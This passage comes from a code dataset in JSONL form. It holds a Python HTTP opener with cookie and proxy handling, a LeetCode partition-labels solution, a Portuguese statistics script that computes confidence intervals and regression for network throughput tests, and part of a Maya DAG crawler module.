"line_number": 30, "usage_type": "call"}, {"api_name": "utils.utils.SmoothedValue", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.utils.warmup_lr_scheduler", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 56, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 62, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 62, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.utils.reduce_dict", "line_number": 74, "usage_type": "call"}, {"api_name": "math.isfinite", "line_number": 78, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.utils.is_main_process", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 114, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 140, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 147, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 159, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 165, "usage_type": "call"}, {"api_name": "utils.utils.mkdir", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 179, "usage_type": "call"}, {"api_name": "eval_func.eval_detection", "line_number": 181, "usage_type": "call"}, {"api_name": "eval_func.eval_search_cuhk", "line_number": 183, "usage_type": "call"}, {"api_name": "eval_func.eval_search_prw", "line_number": 195, "usage_type": "call"}, {"api_name": "eval_func.eval_search_mvn", "line_number": 206, "usage_type": "call"}, {"api_name": "config.ConfigMVN", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "310695109", "text": "# coding=utf8\r\n\r\nfrom urllib.request import build_opener, HTTPCookieProcessor, Request\r\nfrom urllib.parse import urlparse, urlunparse, urlencode, parse_qs\r\nfrom http.cookiejar import LWPCookieJar, DefaultCookiePolicy\r\nimport os.path\r\n\r\nclass Opener:\r\n def __init__(self, cookie_path=None):\r\n self.opener = build_opener()\r\n self.cookiejar = LWPCookieJar()\r\n self.set_cookie_path(cookie_path)\r\n self.opener.add_handler(HTTPCookieProcessor(self.cookiejar))\r\n self.opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20120101 Firefox/11.0')]\r\n self.last_request = None\r\n self.last_response = None\r\n\r\n @property\r\n def request_info(self):\r\n pass\r\n\r\n @property\r\n def response_info(self):\r\n pass\r\n\r\n def set_cookie_path(self, path):\r\n self.cookiejar.filename = path\r\n try:\r\n os.path.exists(path) and self.cookiejar.load()\r\n except:\r\n pass\r\n\r\n def set_headers(self, arg={}, **kwargs):\r\n if not arg and not kwargs:\r\n return\r\n headers = dict(self.opener.addheaders)\r\n headers.update(arg)\r\n headers.update(kwargs)\r\n self.opener.addheaders = list(headers.items())\r\n\r\n def set_cookies(self, *args, **kwargs):\r\n for arg in args:\r\n cookie = DefaultCookiePolicy(**arg)\r\n self.cookiejar.set_cookie(cookie)\r\n kwargs and self.cookiejar.set_cookie(DefaultCookiePolicy(**kwargs))\r\n\r\n def save_cookies(self, cookie_path=None):\r\n if cookie_path or self.cookiejar.filename:\r\n self.cookiejar.save(cookie_path)\r\n\r\n def urlopen(self, url, param=None, data=None, headers={}, proxies={}, timeout=None, encoding='utf8', errors='strict'):\r\n \"\"\" 打开目标链接, 返回一个 HttpResponse对象.\r\n\r\n @url(str/Request): 目标链接.\r\n @param(str/dict/pairs tuple): query string.\r\n @data(bytes/str/dict): post data.\r\n @headers(dict): http request headers.\r\n @proxies(dict): 代理, 如:{'http': 'xx.xx.xx.xx:3128', 'https': 'xxx.xxx.xxx.xxx:8080'}.\r\n @timeout(int): http request timeout.\r\n @encoding/errors(str): url编码.\r\n \"\"\"\r\n if param:\r\n full_url = isinstance(url, Request) and url.get_full_url() or url\r\n url_parse_dict = urlparse(full_url)._asdict()\r\n query_param = url_parse_dict.get('query') + (isinstance(param, str) and param or urlencode(param, encoding, errors))\r\n url_parse_dict['query'] = query_param\r\n full_url = urlunparse(url_parse_dict.values())\r\n request = Request(full_url)\r\n else:\r\n request = isinstance(url, Request) and url or Request(url)\r\n if data:\r\n if isinstance(data, bytes):\r\n request.data = data\r\n elif isinstance(data, str):\r\n request.data = data.encode(encoding, errors)\r\n else:\r\n request.data = urlencode(data).encode(encoding, errors)\r\n for key, value in headers.items():\r\n request.add_header(key, value)\r\n for proxy_type, proxy_host in proxies.items():\r\n request.set_proxy(proxy_host, proxy_type)\r\n self.last_request = request\r\n self.last_response = self.opener.open(request, timeout=timeout)\r\n return self.last_response\r\n\r\n def clear(self):\r\n self.last_request = None\r\n self.last_response = None\r\n", "sub_path": "Python/libs/kisopener.py", "file_name": "kisopener.py", "file_ext": "py", "file_size_in_byte": 3482, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "urllib.request.build_opener", "line_number": 10, "usage_type": "call"}, {"api_name": "http.cookiejar.LWPCookieJar", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.request.HTTPCookieProcessor", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.path.exists", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 29, "usage_type": "name"}, {"api_name": "http.cookiejar.DefaultCookiePolicy", "line_number": 43, "usage_type": "call"}, {"api_name": "http.cookiejar.DefaultCookiePolicy", "line_number": 45, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 63, "usage_type": "argument"}, {"api_name": "urllib.parse.urlparse", "line_number": 64, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 65, "usage_type": "call"}, {"api_name": "urllib.parse.urlunparse", "line_number": 67, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 68, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 70, "usage_type": "argument"}, {"api_name": "urllib.parse.urlencode", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "587109311", "text": "from typing import List\nclass Solution:\n def partitionLabels(self, S: str) -> List[int]:\n lastPos, seen, currMax = {}, set(), -1\n res = []\n for i in range(0, 26):\n c = chr(97+i)\n lastPos[c] = S.rfind(c)\n for i, c in enumerate(S):\n # Encounter new index higher than currMax\n if i > currMax:\n res.append(currMax+1)\n currMax = max(currMax, lastPos[c])\n res.append(len(S))\n ans = [res[i]-res[i-1] for i in range(1, len(res))]\n return ans", "sub_path": "leetcode/763. Partition Labels/soln.py", "file_name": "soln.py", "file_ext": "py", "file_size_in_byte": 555, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.List", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "169046521", "text": "#!/usr/bin/python\n#Aplicacao que reune diversas funcoes estatisticas - Versao 01/07/18\n\nimport sys\nimport math\nimport numpy as np\nfrom matplotlib import pyplot as pl\nfrom grafico import desenha\n#import seaborn as sns\n#sns.set()\n#Bruno\nfrom MontaVetores import RetornaVetoresArquivoEstatistica as vetores_estatistica\n\n\nAPROX = 2\t\t\t#Numero de casas decimais para aproximacao\n\n#Calculo da media\ndef media(L):\n\tsoma=0.0\n\tfor i in L:\n\t\tsoma+=i\n\treturn soma/len(L)\n\n#Calculo da variancia\ndef variancia(L):\n\tsoma=0.0\n\tx=media(L)\n\tfor i in L:\n\t\tsoma+=((i-x)**2)\n\treturn soma/(len(L)-1)\n\n#Calculo do desvio padrao\ndef desvioPadrao(L):\n\treturn math.sqrt(variancia(L))\n\n#Calculo do coeficiente de variacao\ndef cv(L):\n\treturn desvioPadrao(L)/media(L)\n\n#Calculo da covariancia\ndef covariancia(L1,L2):\n\tcov=0\n\tfor i in range(len(L1)):\n\t\tcov+=(L1[i]-media(L1))*(L2[i]-media(L2))\n\treturn cov\n\n#Calculo da correlacao\ndef correlacao(L1,L2):\n\treturn covariancia(L1,L2)/(desvioPadrao(L1)*desvioPadrao(L2))\n\n#Calculo do intervalo de confianca\ndef ic(L,tabela):\n\tintervalo=[]\n\tx=media(L)\n\terroPadrao=desvioPadrao(L)/math.sqrt(len(L))\n\t#tabela=raw_input('Digite o valor da tabela t/z para %d graus de liberdade: ' %(len(L)-1))\n\tliminf=x-(float(tabela)*erroPadrao)\n\tlimsup=x+(float(tabela)*erroPadrao)\n\tintervalo.append(round(liminf,APROX))\n\tintervalo.append(round(limsup,APROX))\n\treturn intervalo\n\n#Calculo do Teste T\ndef icTesteT(L1,L2):\n\tintervalo=[]\n\tx1=media(L1)\n\tx2=media(L2)\n\tep1=variancia(L1)/len(L1)\n\tep2=variancia(L2)/len(L2)\n\ts=math.sqrt(ep1+ep2)\n\tnumeradorv=(ep1+ep2)**2\n\tdenominadorv=((ep1**2/(len(L1)+1))+(ep2**2/(len(L2)+1)))\n\tv=(numeradorv/denominadorv)-2\n\ttabela=raw_input('Digite o valor da tabela t para %f graus de liberdade: ' %v)\n\tintervalo.append((x1-x2)-(float(tabela)*s))\n\tintervalo.append((x1-x2)+(float(tabela)*s))\n\treturn intervalo\n\n#Calculo das diferencas de amostras\ndef difAmostra(L1,L2):\n\tif len(L1)!=len(L2):\n\t\tprint(\"Tamanhos de amostras diferentes\")\n\t\treturn\n\tdif=[]\n\tfor i in range(len(L1)):\n\t\tdif.append(L1[i]-L2[i])\n\treturn dif\n\n#Calculo da regressao linear\ndef regressaoLinear(x,y):\n\tsomatoriox = 0\n\tsomatorioy = 0\n\tsomatorioxy = 0\n\tsomatoriox2 = 0\n\tSSY = 0\n\tsomaestimate = 0\n\tsomae = 0\n\tsomae2 = 0\n\n\tn = len(x)\t\t\t\t\t\t#Quantidade de amostras\n\tSS0 = n * media(y)**2\t\t\t\t\t#Soma dos quadrados da media de y - SS0\n\n\tfor i in range(n):\n\t\tsomatoriox += x[i]\t\t\t\t#Somatorio de x\n\t\tsomatorioy += y[i]\t\t\t\t#Somatorio de y\n\t\tsomatorioxy += x[i] * y[i]\t\t\t#Somatorio de x * y\n\t\tsomatoriox2 += x[i]**2\t\t\t\t#Soma dos quadrados de x\n\t\tSSY += y[i]**2\t\t\t\t\t#Soma dos quadrados de y - SSY\n\n\t#Calculos das estimativas\n\tb1 = round((somatorioxy - n * media(x) * media(y)) / (somatoriox2 - n * (media(x)**2)),APROX)\t#b1\n\tb0 = round(media(y) - (b1 * media(x)),APROX)\t\t\t\t\t\t\t#b0\n\n\tfor i in range(n):\n\t\testimate = b0 + (b1 * x[i])\t\t\t#Estimativa\n\t\tsomaestimate += estimate\t\t\t#Somatorio das estimativas\n\t\te = y[i] - estimate\t\t\t\t#Erro\n\t\te2 = e**2\t\t\t\t\t#Erro quadrado\n\t\tsomae += e\t\t\t\t\t#Soma dos erros\n\t\tsomae2 += e2\t\t\t\t\t#Soma dos erros quadrados\n\n\tSST = SSY - SS0\t\t\t\t\t\t#Soma total dos quadrados - SST\n\tSSE = SSY - (b0 * somatorioy) - (b1 * somatorioxy)\t#Soma dos erros quadrados (com regressao) - SSE\n\n\t#Calculos de R2 e Se\n\tR2 = 1 - (SSE / SST)\t\t\t\t\t#Coeficiente de detelminacao - R2\n\tSe = math.sqrt(SSE / (n - 2))\t\t\t\t#Desvio padrao de erros - Se\n\n\t#Calculos dos intervalos de confianca para regressoes\n\tSb0 = round(Se * math.sqrt((1 / n) + (media(x)**2 / (somatoriox2 - (n * media(x)**2)))),APROX)\n\tSb1 = round(Se / (math.sqrt(somatoriox2 - (n * media(x)**2))),APROX)\n\n\ttabela = float(raw_input('Digite o valor da tabela t/z para %d graus de liberdade: ' %(n - 2)))\n\n\tb0min = b0 - tabela * Sb0\t\t\t\t#Calculo dos intervalos de confianca\n\tb0max = b0 + tabela * Sb0\n\tb1min = b1 - tabela * Sb1\n\tb1max = b1 + tabela * Sb1\n\n\t#print 'Intervalo de confianca b0: %0.4f - %0.4f' %(b0min,b0max)\n\t#print 'Intervalo de confianca b1: %0.4f - %0.4f' %(b1min,b1max)\n\n\t#Calculos dos intervalos de confianca para predicoes\n\txp = int(raw_input('Digite o valor da amostra futura (Xp): '))\n\tm = 1\n\typ = b0 + b1 * xp\n\tSy = round(Se * math.sqrt((1 / m) + (1 / n) + (((xp - media(x))**2) / (somatoriox2 - (n * media(x)**2)))),APROX)\n\n\typmin = yp - tabela * Sy\n\typmax = yp + tabela * Sy\n\t#print 'Intervalo de confianca previsto (Yp): %0.4f - %0.4f' %(ypmin,ypmax)\n\n\t#Criacao dos graficos\n\tpl.title('Regressao Linear')\n\tpl.xlim(0,max(x)+1)\n\tpl.ylim(0,max(y)+1)\n\n\tpl.plot(x,y,'o')\n\n\tx2=np.array([min(x),max(x)])\n\ty2=np.array([media(y),media(y)])\n\tpl.plot(x2,b0+b1*x2,'-')\t\t\t\t#Regressao\n\tpl.plot(x2,y2,'-')\t\t\t\t\t#Media\n\n\tpl.text(max(x)+0.2,media(y),'y')\n\tpl.text(0.2,max(y),'y=%0.4f+%0.4fx' %(b0,b1))\n\tpl.text(0.2,max(y)-0.5,'R2: %0.4f' %R2)\n\tpl.text(0.2,max(y)-1.0,'Se: %0.4f' %Se)\n\tpl.text(0.2,max(y)-1.5,'e: %0.4f' %somae)\n\tpl.text(0.2,max(y)-2.0,'e2: %0.4f' %somae2)\n\n\tpl.show()\n\ndef converteBytesEmMegabits(vetor):#Recebe um vetor\n vet_aux = []\n for i in vetor:\n vet_aux.append(i*0.000008)\n return vet_aux\n\ndef converteBytesEmMegabyte(vetor):#Recebe um vetor\n vet_aux = []\n for i in vetor:\n vet_aux.append(i*0.000001)\n return vet_aux\n\n\n#####Leitura de arquivos de resultados\n#input = open('stp-16x4.txt', 'r')\n#S5 = [float(foo) for foo in input.readlines()]\n#input.close()\n\n'''\n############################################################################\nBruno TCC\n############################################################################\n'''\n\nteste = '2Iperf' #SemIperf,1Iperf,2Iperf\ncenario = '1' #1,2,3\n\ns1_tx1,s1_tx2,s1_tx3,s3_rx1,s3_rx2=vetores_estatistica('/home/bruno/ryu/Bruno/Resultados/Teste/Cenario'+cenario+'_'+teste+'.txt')\n\n#Megabits\ns1_tx1 = converteBytesEmMegabits(s1_tx1)\ns1_tx2 = converteBytesEmMegabits(s1_tx2)\ns1_tx3 = converteBytesEmMegabits(s1_tx3)\ns3_rx1 = converteBytesEmMegabits(s3_rx1)\ns3_rx2 = converteBytesEmMegabits(s3_rx2)\n'''\n#Megabytes\ns1_tx1 = converteBytesEmMegabyte(s1_tx1)\ns1_tx2 = converteBytesEmMegabyte(s1_tx2)\ns1_tx3 = converteBytesEmMegabyte(s1_tx3)\ns3_rx1 = converteBytesEmMegabyte(s3_rx1)\ns3_rx2 = converteBytesEmMegabyte(s3_rx2)\n'''\n#####Valores de tabelas T/Z\ntam = len(s1_tx1)\n\nif tam > 30:\n\ttab = '1.96'\nif tam == 30:\n\ttab = '2.045'\nif tam == 25:\n\ttab = '2.064'\nif tam == 20:\n\ttab = '2.093'\nif tam == 15:\n\ttab = '2.145'\n\n\n\n#tab='1.645'\t#>30 90%\n#tab='1.699'\t#30 90%\n#tab='1.711'\t#25 90%\n#tab='1.729'\t#20 90%\n#tab='1.761'\t#15 90%\n\n#####Medias\nmedia_s1_tx1=round(media(s1_tx1),APROX)\nmedia_s1_tx2=round(media(s1_tx2),APROX)\nmedia_s1_tx3=round(media(s1_tx3),APROX)\nmedia_s3_rx1=round(media(s3_rx1),APROX)\nmedia_s3_rx2=round(media(s3_rx2),APROX)\n'''\nme5=round(media(E5),APROX)\nme10=round(media(E10),APROX)\nme15=round(media(E15),APROX)\nme20=round(media(E20),APROX)\n\nmt5=round(media(T5),APROX)\nmt10=round(media(T10),APROX)\nmt15=round(media(T15),APROX)\nmt20=round(media(T20),APROX)\n\nmi5=round(media(I5),APROX)\nmi10=round(media(I10),APROX)\nmi15=round(media(I15),APROX)\nmi20=round(media(I20),APROX)\n'''\n#####Intervalos de Confianca\nic_s1_tx1=ic(s1_tx1,tab)\nic_s1_tx2=ic(s1_tx2,tab)\nic_s1_tx3=ic(s1_tx3,tab)\nic_s3_rx1=ic(s3_rx1,tab)\nic_s3_rx2=ic(s3_rx2,tab)\n\n'''\nie5=ic(E5,tab)\nie10=ic(E10,tab)\nie15=ic(E15,tab)\nie20=ic(E20,tab)\n\nit5=ic(T5,tab)\nit10=ic(T10,tab)\nit15=ic(T15,tab)\nit20=ic(T20,tab)\n\nii5=ic(I5,tab)\nii10=ic(I10,tab)\nii15=ic(I15,tab)\nii20=ic(I20,tab)\n'''\n#####Impressao dos resultados\n#EntradaVideo\nprint('\\n\\nMedia s3_rx1: '+str(media_s3_rx1))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s3_rx1),APROX)))\nprint('Variancia: '+str(round(variancia(s3_rx1),APROX)))\nprint('IC s3_rx1: '+str(ic_s3_rx1))\n\n#SaidaVideo\nprint('\\n\\nMedia s1_tx1: '+str(media_s1_tx1))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s1_tx1),APROX)))\nprint('Variancia: '+str(round(variancia(s1_tx1),APROX)))\nprint('IC s1_tx1: '+str(ic_s1_tx1))\n\n#EntradaIperf\nprint('\\n\\nMedia s3_rx2: '+str(media_s3_rx2))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s3_rx2),APROX)))\nprint('Variancia: '+str(round(variancia(s3_rx2),APROX)))\nprint('IC s3_rx2: '+str(ic_s3_rx2))\n\n#Saida Iperf 1\nprint('\\n\\nMedia s1_tx2: '+str(media_s1_tx2))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s1_tx2),APROX)))\nprint('Variancia: '+str(round(variancia(s1_tx2),APROX)))\nprint('IC s1_tx2: '+str(ic_s1_tx2))\n\n#Saida Iperf 2\nprint('\\n\\nMedia s1_tx3: '+str(media_s1_tx3))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s1_tx3),APROX)))\nprint('Variancia: '+str(round(variancia(s1_tx3),APROX)))\nprint('IC s1_tx3: '+str(ic_s1_tx3))\n\n\n\n\n\n\n\n\n\n\n\n\n#####Geracao dos graficos\nif teste == 'SemIperf':\n\tparam1=[media_s3_rx1,media_s1_tx1]\n\tparam2=[(ic_s3_rx1[1]-ic_s3_rx1[0])/2,(ic_s1_tx1[1]-ic_s1_tx1[0])/2]\n\tnome = 'Cenario '+cenario+' sem carga de trabalho'\n\tdesenha(param1,param2, 2000,nome,teste)\nelif teste == '1Iperf':\n\tparam1=[media_s3_rx1,media_s1_tx1,media_s3_rx2,media_s1_tx2]\n\tparam2=[(ic_s3_rx1[1]-ic_s3_rx1[0])/2,(ic_s1_tx1[1]-ic_s1_tx1[0])/2,(ic_s3_rx2[1]-ic_s3_rx2[0])/2,(ic_s1_tx2[1]-ic_s1_tx2[0])/2]\n\tnome = 'Cenario '+cenario+' com uma carga de trabalho'\n\tdesenha(param1,param2, 5000,nome,teste)\nelse:\n\tparam1=[media_s3_rx1,media_s1_tx1,media_s3_rx2,media_s1_tx2,media_s1_tx3]\n\tparam2=[(ic_s3_rx1[1]-ic_s3_rx1[0])/2,(ic_s1_tx1[1]-ic_s1_tx1[0])/2,(ic_s3_rx2[1]-ic_s3_rx2[0])/2,(ic_s1_tx2[1]-ic_s1_tx2[0])/2,(ic_s1_tx3[1]-ic_s1_tx3[0])/2]\n\tnome = 'Cenario '+cenario+' com duas cargas de trabalho'\n\tdesenha(param1,param2, 8000,nome,teste)\n\n\n\n'''\nparam1=[ms10,mt10,me10,mi10]\nparam2=[(is10[1]-is10[0])/2,(it10[1]-it10[0])/2,(ie10[1]-ie10[0])/2,(ii10[1]-ii10[0])/2]\ndesenha(param1,param2,200,'Trace 128 maps/4 reduces')\n\nparam1=[ms15,mt15,me15,mi15]\nparam2=[(is15[1]-is15[0])/2,(it15[1]-it15[0])/2,(ie15[1]-ie15[0])/2,(ii15[1]-ii15[0])/2]\ndesenha(param1,param2,200,'Trace 192 maps/16 reduces')\n\nparam1=[ms20,mt20,me20,mi20]\nparam2=[(is20[1]-is20[0])/2,(it20[1]-it20[0])/2,(ie20[1]-ie20[0])/2,(ii20[1]-ii20[0])/2]\ndesenha(param1,param2,350,'Trace 256 maps/16 reduces')\n'''\n", "sub_path": "Bruno/Funcoes/estatistica_tcc.py", "file_name": "estatistica_tcc.py", "file_ext": "py", "file_size_in_byte": 9856, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "math.sqrt", "line_number": 34, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 55, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 127, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 130, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 131, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "MontaVetores.RetornaVetoresArquivoEstatistica", "line_number": 201, "usage_type": "call"}, {"api_name": "grafico.desenha", "line_number": 331, "usage_type": "call"}, {"api_name": "grafico.desenha", "line_number": 336, "usage_type": "call"}, {"api_name": "grafico.desenha", "line_number": 341, "usage_type": "call"}]} +{"seq_id": "71060708", "text": "# -------------------------------------------------------------------------- #\n# ---------------------------------------------------------------- HEADER -- #\n\"\"\"\n@organization: Kludgeworks LLC\n\n@description: Utilities for working with the Maya DAG\n\n@author: Ed Whetstone\n\n@applications: MAYA\n\"\"\"\n\n# -------------------------------------------------------------------------- #\n# --------------------------------------------------------------- IMPORTS -- #\n# built-in\nfrom itertools import chain\n\n# internal\nimport vfx_utils.omni.slog as slog\nfrom vfx_utils.omni.data_types import TreeDict, TreeNode\nimport vfx_utils.mirage.api_utils as api\nfrom vfx_utils.mirage.api_utils import msplit\nfrom vfx_utils.mirage.maya_callbacks.watchers import SceneWatcher\n\n# domain\nimport maya.OpenMaya as om\n\n# -------------------------------------------------------------------------- #\n# --------------------------------------------------------------- GLOBALS -- #\nDAGNODE = TreeNode('__dagnode__', repr_='DAGNODE')\n\nlogger = slog.Logger()\nlogger.level = 3\n\ncb_logger = slog.Logger('DAG_Crawler_Callbacks')\ncb_logger.formatter = lambda msg, lvl, **_: \"DAG_CRAWLER: {0}\".format(msg)\ncb_logger.level = 3\n\n# -------------------------------------------------------------------------- #\n# --------------------------------------------------------- DAG TRAVERSAL -- #\ndef dag_generator():\n iterator = om.MItDag(om.MItDag.kDepthFirst)\n current_item_getter = iterator.currentItem\n next_ = iterator.next\n while not iterator.isDone():\n yield current_item_getter()\n next_()\n raise StopIteration\n\n# -------------------------------------------------------------------------- #\n# ----------------------------------------------------------- DAG CRAWLER -- #\nclass DagCrawler(object):\n \"\"\"the dag crawler is a model of the maya dag, represented with\n ApiNodes in a nested TreeDict. See the data_types module for more\n information on TreeDicts and TreeNodes\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.key_type = DAGNODE\n self.tree = TreeDict(*args, **kwargs)\n self.path_dict = dict()\n\n def populate(self, nodes=None):\n \"\"\"Create a dict representing the full dag path for all objects\n in the scene. by default this includes all DAG nodes. Subclasses\n can create their own populate functions.\"\"\"\n tree = self.tree = TreeDict()\n if nodes is None:\n nodes = dg_iter(iterator_type='dag').to_api_nodes()\n else:\n nodes = list(nodes)\n node_chain = list(chain(*[([node]\n + node.ancestors\n + node.descendants)\n for node in nodes]))\n nodes = list(set(node_chain))\n nodes = [node for node in nodes if node.parent]\n\n # build path tree\n for api_node in nodes:\n path = self._api_node_to_path(api_node)\n self._save_path(api_node, path)\n path.append(self.key_type)\n tree.set_at_path(path, api_node)\n\n def _save_path(self, api_node, path):\n \"\"\"cache the given api node's name path\"\"\"\n self.path_dict[api_node] = tuple(path)\n\n def _clear_saved_path(self, api_node):\n cb_logger.debug('clearing saved path for {}', api_node)\n self.path_dict.pop(api_node)\n\n def repath(self, api_node, old_path, new_path, repath_descendants=False):\n \"\"\"Do the necessary work to remove an old path and replace it with\n a new one. If necessary, also repath all the descendants of the\n given node\"\"\"\n self.tree.repath(old_path, new_path)\n self._clear_saved_path(api_node)\n self._save_path(api_node, new_path)\n if repath_descendants:\n descendants = api_node.descendants\n for node in descendants:\n new_desc_path = self._api_node_to_path(node)\n self._clear_saved_path(node)\n self._save_path(node, new_desc_path)\n\n def _branch_at_split(self, split_path):\n \"\"\"get the TreeNode represented by the path\"\"\"\n return self.tree.get_at_path(split_path)\n\n def _api_node_to_path(self, api_node, use_cache=False):\n \"\"\"return a path given an api node. If use_cache is True,\n attempt to return the cached version of the path\"\"\"\n if use_cache:\n try:\n return self.path_dict[api_node]\n except:\n pass\n path = msplit(api_node.long_name)[1:]\n return path\n\n def _api_node_to_node_path(self, api_node, use_cache=False):\n \"\"\"return the node hierarchy leading to this node\"\"\"\n path = self._api_node_to_path(api_node, use_cache=use_cache)\n path.append(self.key_type)\n return path\n\n def _path_to_api_node(self, split_path):\n \"\"\"given a name path, return the node at the end of it\"\"\"\n return self.tree.get_at_path(split_path)\n\n def branch_at_node(self, api_node):\n \"\"\"return the TreeNode represented by the given api_node\"\"\"\n path = self._api_node_to_path(api_node)\n return self._branch_at_split(path)\n\n def name_to_node(self, node_name):\n \"\"\"given the name of a node, return the api_node representation\"\"\"\n if node_name.startswith('|'):\n split_path = msplit(node_name[1:])\n else:\n split_path = msplit(node_name)\n return self._path_to_api_node(split_path + [self.key_type])\n\n def add_node(self, api_node):\n \"\"\"add a node to the DagCrawler model\"\"\"\n path = self._api_node_to_path(api_node)\n self._save_path(api_node, path)\n path.append(self.key_type)\n self.tree.set_at_path(path, api_node)\n\n def remove_node(self, api_node):\n \"\"\"remove a node from the DagCrawler model\"\"\"\n if api_node in self.path_dict:\n path = self._api_node_to_path(api_node, use_cache=True)\n try:\n self.tree.pop_at_path(path)\n except KeyError:\n path = self._api_node_to_path(api_node, use_cache=False)\n self.tree.pop_at_path(path)\n for node in [api_node] + api_node.descendants:\n self._clear_saved_path(node)\n 